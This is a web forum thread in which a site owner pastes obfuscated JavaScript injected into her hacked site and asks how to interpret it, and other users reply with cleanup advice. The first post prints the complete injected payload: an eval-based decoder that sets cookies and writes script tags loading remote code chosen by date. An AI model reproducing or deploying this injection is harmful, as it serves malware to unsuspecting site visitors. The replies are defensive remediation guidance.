my site been hacked - Interpret Javascript code

jessicakoh · #1 (**permalink**) 03-19-10, 11:34 PM

My sites have been hacked.

Code:

echo <script language="javascript">function t(){return z($a);}var $a="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ25252Z2565wrZ25256Z2539Z2574Z2565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscZ252572ipZ252574 laZ25256egZ252575aZ2567eZ25253dZ2525Z2535cZ252522jaZ2576Z2561Z2573crZ25256Z2539ptZ25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ2525Z2535cZ25252fscZ2525Z25372Z2569pZ252574Z25253eZ2527;evZ2561Z256c(unZ2565scZ2561pZ2565(t)Z2529};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22dZ2573);sZ2574Z253dtmpZ253dZ2527Z2527;foZ2572Z2528iZ253d0;iZ253cdsZ252elZ2565Z256eZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;czZ3dZ22Z2566uncZ2574ionZ2520Z2563Z257aZ2528czZ2529Z257bretuZ2572n Z2563a+Z2563Z2562+cZ2563+Z2563d+cZ2565+czZ253bZ257d;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22gtZ2568;i+Z252b)Z257btmpZ253ddsZ252eslZ2569ce(Z2569Z252ci+1Z2529;stZ253dZ2573Z25Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e Z2564csZ2528dZ2573,eZ2573)Z257bdsZ253duneZ2573capZ2565(Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;ceZ3dZ22Z2561rCoZ2564eAtZ25280)Z255e(Z25270Z25780Z2530Z2527+Z2565sZ2529)Z2529;Z257d}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573(Z2564Z2561+Z2564bZ252bZ2564cZ252bZ2564Z2564+Z2564Z2565,Z2531Z2530)Z253bZ2564Z2577(Z2573tZ2529Z253bZ2573Z2574Z253d$Z2561Z253bZ2522;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ2274+Z2553trZ2569ng.Z2566romZ2543haZ2572CZ256fdZ2565Z2528(Z2574mZ2570Z252eZ2563Z2568Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563s(cZ2575,1Z2534))Z253bZ2522;Z22;Z69f (Z64ocZ75mZ65nZ74Z2ecZ6fokZ69e.iZ6edeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fnZ20cZ61llbZ61ckZ28Z78)Z7bwinZ64ow.Z74w Z3dZ20x;vZ61rZ20Z64 Z3d Z6eewZ20DaZ74eZ28Z29;dZ2esetZ54imZ65(xZ5bZ22aZ73_ofZ22]Z2a10Z30Z30);vZ61Z72 Z68Z20Z3d Z64.Z67Z65Z74UTCZ48oZ75rZ73()Z3bwinZ64oZ77.h Z3dZ20h;iZ66Z20(h Z3e 8Z29Z7bd.sZ65tUZ54CDaZ74e(dZ2egZ65Z74UTZ43DatZ65()Z20- 2Z29;}eZ6cZ73eZ7bdZ2eseZ74UTZ43DaZ74e(dZ2egeZ74UTZ43DZ61tZ65Z28Z29 - Z33)Z3b}Z77Z69nZ64oZ77.gdZ20Z3d Z64Z3bvZ61r Z74iZ6dZ65 Z3d Z6eeZ77 ArZ72ay(Z29Z3bvarZ20shZ69Z66tZ49nZ64eZ78 Z3d Z22Z22;timZ65[Z22yeaZ72Z22] Z3d d.Z67etZ55TZ43FulZ6cYeaZ72Z28);Z74imZ65[Z22monZ74hZ22] Z3d d.Z67etZ55TCZ4doZ6eth(Z29+Z31Z3btiZ6dZ65[Z22daZ79Z22Z5dZ20Z3d d.gZ65Z74Z55TCZ44Z61te(Z29;iZ66 Z28Z64.geZ74UTZ43MoZ6etZ68(Z29Z2b1 Z3c 10Z29Z7bshifZ74InZ64exZ20Z3d tiZ6de[Z22yearZ22]Z20+ Z22-Z30Z22 +Z20(Z64.geZ74UTCZ4doZ6ethZ28Z29Z2bZ31);}Z65lseZ7bZ73Z68iZ66tZ49Z6edexZ20Z3dZ20tiZ6de[Z22yeaZ72Z22] +Z20Z22-Z22 + Z28dZ2egZ65tUTZ43MoZ6eZ74Z68(Z29Z2bZ31)Z3b}Z69f (Z64.gZ65Z74UTCZ44ateZ28Z29 Z3c 10Z29Z7bshifZ74Z49ndZ65x Z3dsZ68iftZ49Z6eZ64ex Z2b Z22-0Z22Z20+ dZ2eZ67etZ55Z54CZ44atZ65()Z3b}elZ73eZ7bshZ69Z66tIZ6edexZ20Z3d sZ68iftZ49ndeZ78 Z2bZ20Z22-Z22 + d.Z67etUZ54Z43Z44Z61te(Z29Z3b}doZ63Z75menZ74.wrZ69Z74e(Z22Z3cscZ72Z22+Z22Z69pt Z6cZ61nguZ61Z67eZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77iZ74Z74Z65Z72.Z63omZ2ftZ72endZ73Z2fdZ61ilZ79.jsZ6fZ6e?Z64aZ74Z65Z3dZ22+ shiftIZ6eZ64eZ78+Z22&cZ61lZ6cbaZ63kZ3dcalZ6cbacZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22ipZ74Z3eZ22);} funcZ74ioZ6e cZ61llbZ61ckZ32(x)Z7bwinZ64ow.Z74wZ20Z3d x;scZ28Z27rf5fZ36dsZ27,Z32Z2c7);Z65Z76aZ6c(Z75Z6eesZ63Z61Z70e(dZ7aZ2bcZ7a+oZ70+stZ29Z2bZ27dw(Z64z+Z63z($Z61+stZ29);Z27)Z3bdZ6fcumZ65Z6et.wZ72itZ65($Z61Z29Z3b}dZ6fZ63Z75mZ65Z6et.Z77Z72iteZ28Z22Z3cimg srZ63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.twZ69tZ74Z65rZ2ecZ6fZ6dZ2fimaZ67esZ2fZ73Z65aZ72chZ2frssZ2epngZ27Z20Z77iZ64tZ68Z3d1 hZ65Z69ghZ74Z3d1Z20stZ79leZ3dZ27visibZ69liZ74y:Z68iZ64Z64enZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cZ61nZ67uZ61Z67eZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearZ63h.tZ77iZ74Z74Z65r.cZ6fmZ2ftreZ6edsZ2fdaZ69ly.Z6asoZ6e?Z63alZ6cbZ61ckZ3dcZ61Z6clbZ61Z63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22ipZ74Z3eZ22);}eZ6cZ73eZ7b$aZ3dZ27Z27};funcZ74iZ6fn Z73c(Z63nm,Z76,eZ64)Z7bvar Z65xdZ3dnew Z44aZ74Z65(Z29;Z65xdZ2esetZ44aZ74Z65(Z65Z78dZ2eZ67Z65tDZ61Z74e()Z2bZ65d)Z3bZ64oZ63umZ65Z6et.Z63ookZ69eZ3dcnm+Z20Z27Z3dZ27 +escape(vZ29Z2bZ27;eZ78pirZ65sZ3dZ27+exdZ2eZ74Z6fZ47MTZ53Z74riZ6eg()Z3b};";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>'';

Can you tell me how to interpret this code? I want to find out the culprit.

I believe it's an insider's job in my web host.

Thank you.

wirehopper · #2 (**permalink**) 03-20-10, 09:15 AM

Don't try to interpret the code. You won't learn anything, you may infect your PC with malware.

It's probably not an "insider's job". Your site got hacked, and it happens everyday. A server is a resource and hackers use other people's servers for many malicious actions.

Here are some tips for cleaning up after your site/server has been hacked.

Look at the files that don’t belong - find a common pattern. Most have one.

Use grep -rl pattern * to find all the affected files. If you pipe the output to a file, you can turn it into a script that can automatically delete them. However - be careful to leave any files that are important. Those will have to be cleaned up manually.

If you run into permission issues, where the files were created by ‘nobody.nobody’ or ‘apache.apache’, you can use PHP’s system command to execute the rms - like so:

Code:

system('rm -f badfile.file');

Check your error logs and access logs, as well as your stats to find any additional files.

Avoid chmod 777 - although there are times when it is necessary. This is a hazard of administering a site through the web. An excellent alternative is to always chmod 755 after you edit those files, if possible. This won’t work for caches, template compilation directories, or file upload areas.

Don’t forget to escape the input, for both command lines and SQL statements, and validate on both the client and server side.

Be sure to identify how the hacker got in, whether it was an outdated application with security holes, SSH, your code, or some other failure. Resolve that issue.

Remember that there may be more than one symptom of the hack. My server was being used to distribute files, run a phishing scam (no page requests were processed when I found it), and links to other servers in hacked templates.

If you have a hosting company, it is good to contact them for help - especially if there is any sort of phishing or other financial scam involved.

Finally, sometimes it is better to delete a corrupted application, or reinstall it.

jessicakoh · #3 (**permalink**) 03-22-10, 07:49 PM

I am on a cloud shared hosting. So, I don't have access to the ssh.

I suspect it's an insiders' job.

By interpreting the code, hopefully I can find the culprit.

wirehopper · #4 (**permalink**) 03-23-10, 06:55 AM

I can almost promise it isn't an insider's job, and you won't find the culprit.

However, you really need to clean it up, as fast as possible, because you are risking every computer that visits your site, and some search engines warn people if a site is serving up malware - which means your site may lose credibility if it is not cleaned up quickly.

Sites get hacked all the time, don't worry about it.

If you have a copy of the site on your PC, just upload a new copy. If you don't - then you'll need to check all the files and clean them up.

Your hosting company may be able to help you.

consc198 · #5 (**permalink**) 03-23-10, 09:18 AM

Did you find this code in an existing page of your website?